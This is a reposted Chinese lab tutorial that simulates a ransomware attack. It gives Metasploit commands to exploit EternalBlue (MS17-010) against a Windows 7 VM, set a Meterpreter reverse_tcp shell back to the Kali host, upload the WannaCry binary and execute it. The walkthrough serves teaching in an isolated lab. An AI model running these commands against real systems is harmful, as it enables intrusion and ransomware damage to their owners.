码迷,mamicode.com
首页 > 其他好文 > 详细

勒索病毒场景模拟及原理

时间:2019-03-29 21:08:05      阅读:230      评论:0      收藏:0      [点我收藏+]

标签:ack   控制   console   str   window   com   原理   src   bash   

 

一、环境准备

需准备如下环境及工具:

1)     一台攻击虚机(Kali linux),一台靶机(Win7 64位)

 3)   永恒之蓝(wannacry)病毒文件

二、环境准备

1.在kali linux下启动msfconsole

通过该应用,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等。

root@kali:~#msfconsole

 技术图片

2.利用永恒之蓝MS17-010漏洞

msf > use exploit/windows/smb/ms17_010_eternalblue

 技术图片

3. 设定靶机 IP 和操作机 IP

172.22.170.4为操作机kali-linux ip地址
172.22.171.4为靶机windows 7 ip地址

msf exploit (windows/smb/ms17_010_eternalblue) >  set rhost 172.22.171.4
msf exploit (windows/smb/ms17_010_eternalblue) >  set lhost 172.22.170.4

 技术图片

技术图片

4.设置TCP连接

使用meterpreter编写的TCP反弹连接木马,用于在渗透成功后向攻击机发起连接请求进一步控制靶机的模块。

set payload windows/x64/meterpreter/reverse_tcp

 技术图片

技术图片

技术图片

5.进行渗透

界面如下显示,则表示渗透成功

技术图片

6.向目标主机传输病毒文件(慎用,仅用于实验测试)

 技术图片

成功传输

技术图片

6.在目标主机上执行该病毒文件

execute -f C:\\Wannacry.exe

 

7.目标主机被攻陷

技术图片

 

勒索病毒场景模拟及原理

标签:ack   控制   console   str   window   com   原理   src   bash   

原文地址:https://www.cnblogs.com/yaqiong-hu/p/10623744.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!